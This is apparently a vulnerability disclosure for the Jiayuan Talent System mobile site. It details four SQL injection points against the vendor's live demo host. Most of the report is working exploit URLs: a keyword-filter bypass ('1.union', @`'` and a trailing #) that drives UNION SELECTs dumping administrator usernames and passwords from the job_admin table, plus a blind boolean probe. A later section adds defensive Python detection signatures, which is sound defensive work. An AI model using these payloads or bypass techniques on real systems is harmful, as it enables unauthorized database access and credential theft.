### Brief description:
Four SQL injection points in 嘉缘人才系统 (Jiayuan Talent System).
Tested against the official demo site.
### Details:
The touch-screen (mobile) edition of 嘉缘人才系统 is at http://m.rccms.com.
Injection point 1:
```
http://m.rccms.com/co/company.php?id=1065
```
![1.png](https://images.seebug.org/upload/201411/191912419a82d7ae38010ff98396194a45c3f726.png)
Changing the parameter to id=1065 and produces a SQL error.
```
http://m.rccms.com/co/company.php?id=1065%20and
```
![2.png](https://images.seebug.org/upload/201411/191912582bf24840b40aaaf19bdca6009487cf47.png)
Changing the parameter to id=1065 and 1=1 brings the information back, which is enough to confirm that SQL injection exists here.
![3.png](https://images.seebug.org/upload/201411/1919135007b31d09e6f92b3bde7d6c04bd56730c.png)
嘉缘人才系统 checks the SQL for keywords such as union/select. For union, writing 1.union gets past the check; for select, prefixing @`'` and appending #' bypasses it. The SQL is therefore constructed as follows:
```
id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1%23'
```
This raises a SQL error because the column count does not match, so we keep going:
```
id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1,2%23'
id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1,2,3%23'
id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1,2,3,4%23'
id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1,2,3,4,5%23'
```
until there is no SQL error and the page renders normally; the parameter is:
```
id=1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27
```
![4.png](https://images.seebug.org/upload/201411/1919193097914fbab8e9d02537d96dde9117b1aa.png)
Now we replace the 63 above with a select that dumps the administrator table:
```
(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin))
```
The complete parameter is:
```
1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin),64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27
```
Done: the data is displayed.
```
http://m.rccms.com/co/company.php?id=1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin),64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27
```
![5.png](https://images.seebug.org/upload/201411/191921117c4dab2aaf28a3e4f594a6fdfb3dece1.png)
Injection point 2:
```
http://m.rccms.com/co/hire.php?id=1
```
```
http://m.rccms.com/co/hire.php?id=1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144%0alimit%0a1%23%27
```
![hire.png](https://images.seebug.org/upload/201411/1920033250987f8a9db7942d496f721038e963eb.png)
Injection point 3:
```
http://m.rccms.com/co/hires.php?id=2
```
```
2%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27
```
```
http://m.rccms.com/co/hires.php?id=2%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27
```
![hires.png](https://images.seebug.org/upload/201411/192003509f5ce7679ba923c81ea82f675f3fb0f2.png)
Injection point 4:
```
http://m.rccms.com/co/map.php?id=2
```
The id parameter is vulnerable to blind injection.
```
http://m.rccms.com/co/map.php?id=1065%20and%20substr(user(),1,1)%3Dchar(0x63)
```
returns the normal page,
![map.png](https://images.seebug.org/upload/201411/19200403ff642c4bc9f6a5557b7717e20554d95b.png)
```
http://m.rccms.com/co/map.php?id=1065%20and%20substr(user(),1,1)%3Dchar(0x64)
```
returns a parameter error.
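As an added example (not part of this report and not the vendor's code), the Python below models the kind of keyword check the report describes, shows that the report's own payload shapes slip past it, and then applies normalized detection signatures that a defender could run over web access logs. The filter model and the sample id values are assumptions constructed from the report.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample values for the ?id= parameter, shaped like the
# report's requests; not captured from any real server.
SAMPLE_IDS = {
    "benign": "1065",
    "error_probe": "1065%20and",
    "union_bypass": "1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,2%23%27",
    "blind_probe": "1065%20and%20substr(user(),1,1)%3Dchar(0x63)",
    "plain_union": "1%20union%20select%201,2",
}

def naive_keyword_filter(raw: str) -> bool:
    """Hypothetical model of the keyword check the report describes (not the
    vendor's code): block when a bare union/select keyword appears outside a
    single-quoted string. Returns True when the request would be blocked."""
    decoded = unquote_plus(raw)
    outside_quotes = re.sub(r"'[^']*'", "''", decoded)
    return re.search(r"(?<![\w.])(union|select)(?![\w.])",
                     outside_quotes, re.I) is not None

def normalize(raw: str) -> str:
    """Decode percent-encoding, collapse all whitespace (%0a newlines included)
    and lowercase, so the signatures see roughly what the database engine sees."""
    return re.sub(r"\s+", " ", unquote_plus(raw)).strip().lower()

# Signatures for the tricks used in the report, applied after normalization.
SIGNS = {
    "dotted_union":  r"\d\.\s*union\b",          # 1.union keyword split
    "backtick_var":  r"@`[^`]*'[^`]*`",          # @`'` user variable hiding a quote
    "union_select":  r"\bunion\b.*\bselect\b",
    "comment_tail":  r"#['\"]?$",                # trailing #' closes the quote
    "boolean_probe": r"\band\s+(substr\(|\d+=\d+)",
    "dangling_and":  r"\band$",
}

def detect(raw: str) -> list:
    """Return the names of the injection signs present in an id value.
    A purely numeric id (what company.php etc. expect) yields no findings."""
    text = normalize(raw)
    if re.fullmatch(r"\d+", text):
        return []
    return [name for name, pat in SIGNS.items() if re.search(pat, text)]

if __name__ == "__main__":
    for label, value in SAMPLE_IDS.items():
        print(f"{label}: blocked={naive_keyword_filter(value)} signs={detect(value)}")
```

Signatures like these are for detection only; the durable fix for all four endpoints is to cast id to an integer or bind it through a prepared statement rather than filtering keywords.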
### Proof of vulnerability:
![5.png](https://images.seebug.org/upload/201411/191921117c4dab2aaf28a3e4f594a6fdfb3dece1.png)
![hire.png](https://images.seebug.org/upload/201411/1920033250987f8a9db7942d496f721038e963eb.png)
![hires.png](https://images.seebug.org/upload/201411/192003509f5ce7679ba923c81ea82f675f3fb0f2.png)
![map.png](https://images.seebug.org/upload/201411/19200403ff642c4bc9f6a5557b7717e20554d95b.png)